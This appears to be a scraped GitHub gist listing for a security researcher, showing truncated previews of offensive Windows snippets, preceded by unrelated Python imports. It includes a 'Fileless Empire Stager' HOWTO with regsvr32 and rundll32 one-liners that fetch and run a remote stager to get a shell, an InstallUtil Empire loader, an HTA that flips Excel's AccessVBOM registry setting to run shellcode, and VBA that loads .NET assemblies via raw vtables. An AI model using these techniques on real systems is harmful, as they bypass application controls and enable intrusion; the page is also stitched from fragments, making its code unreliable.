# coding=utf-8
import datetime
import sys
import time
import threading
import traceback
import SocketServer
from dnslib import *
khr0x40sh / HOWTO
Created April 19, 2016 14:32
Fileless Empire Stager
1. Create Empire Listener
2. Generate Stager
3. Host Stager Code At Some URL
4. Host .sct File At Some URL
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll
6. Instantiate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() )
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec();
7. Wait for Shell...
khr0x40sh / empire.cs
Created April 19, 2016 14:32
PowerShell Empire via InstallUtil.exe
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//Add For PowerShell Invocation
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
khr0x40sh / InstallUtil.hta
Created April 19, 2016 14:34
Download And Compile
//Set your settings
var strFileURL = "";
var oTest = new ActiveXObject("");
var pathTest = oTest.ExpandEnvironmentStrings("%USERPROFILE%") + "\\Downloads\\execalc.html";
var strHDLocation = pathTest;
khr0x40sh / CalcExcel.hta
Created April 19, 2016 14:35
Shellcode Execution Via HTA
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
khr0x40sh / elgamal.ps1
Created April 19, 2016 14:36
ElGamal Encryption in PowerShell
ElGamal in PowerShell
by Casey Smith @subTee
The key generator works as follows:
Alice generates an efficient description of a cyclic group G of order q, with generator g.
Alice chooses x uniformly at random from 1 to (q-1).
Alice computes h = g^x.
khr0x40sh / mscorlib_load_assembly.vba
Created October 1, 2019 13:28 — forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb
Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long
Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr)
Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr
#If Win64 Then
Const LS As LongPtr = 8&
Const LS As LongPtr = 4&
khr0x40sh / psCompress.ps1
Created April 6, 2023 17:16 — forked from marcgeld/psCompress.ps1
Powershell: Compress and decompress byte array
# Compress and decompress byte array
function Get-CompressedByteArray {
Param (
[byte[]] $byteArray = $(Throw("-byteArray is required"))
Process {
khr0x40sh / PowershellAes.ps1
Created April 6, 2023 17:21 — forked from ctigeek/PowershellAes.ps1
AES encryption using PowerShell.
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)